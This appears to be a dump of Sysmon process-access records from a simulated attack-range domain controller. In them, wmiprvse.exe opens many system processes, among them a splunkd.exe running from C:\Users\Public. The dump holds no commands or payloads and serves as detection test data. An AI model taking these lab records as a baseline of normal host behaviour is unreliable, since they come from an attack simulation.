15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027428Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027427Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027426Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027425Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027424Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027423Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027422Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027421Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.569{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027420Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027419Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027418Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027417Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027416Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027415Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027414Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027413Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027412Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027411Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027410Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:43.553{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027409Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 